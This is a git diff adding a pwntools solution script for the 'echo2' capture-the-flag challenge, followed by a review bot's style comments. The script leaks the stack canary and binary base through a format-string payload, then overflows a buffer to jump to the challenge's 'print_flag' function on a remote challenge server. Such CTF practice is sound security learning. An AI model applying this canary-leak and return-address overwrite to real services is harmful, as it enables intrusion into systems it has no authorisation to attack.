diff --git a/blockctf_2024/echo2/a.py b/blockctf_2024/echo2/a.py
new file mode 100644
index 0000000..8074c1a
--- /dev/null
+++ b/blockctf_2024/echo2/a.py
@@ -0,0 +1,28 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./echo-app2", checksec=False)
+# r = process()
+r = remote("54.85.45.101", 8009)
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# leak
+buf = b"%39$p.%42$p"
+s(buf)
+leaks = r.recvS(34).split(".")
+canary = int(leaks[0], 16)
+log.info("canary: %#x", canary)
+target.address = int(leaks[1], 16)-0x15a1
+log.info("main: %#x", target.address)
+
+# buf
+buf = b"A"*264
+buf += p64(canary)
+buf += p64(0)
+buf += p64(target.sym.print_flag)
+s(buf)
+
+r.interactive()
\ No newline at end of file
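Review bot: The constant `0x15a1` on the `target.address = int(leaks[1], 16)-0x15a1` line and the indices in `b"%39$p.%42$p"` are undocumented magic numbers, so a reader cannot tell what they represent or that they are tied to this particular build of `echo-app2`; a comment on each, e.g. `# presumably the distance from the leaked return address to the ELF base for this build`, and `# stack positions of the canary and a return address into the binary`, would make the script reviewable. The fixed `r.recvS(34)` length and the two `int(..., 16)` calls assume the reply has exactly the expected shape, and a deviation surfaces only as an unrelated `ValueError` or `IndexError`; a short comment stating that assumption would help. The module also has no header docstring, and the commented-out `# r = process()` next to the hard-coded `remote(...)` call reads as leftover scratch; a one-line docstring naming the challenge (blockctf_2024/echo2) and selecting local vs. remote via pwntools' `args` would be the cleaner form. The file also lacks a trailing newline.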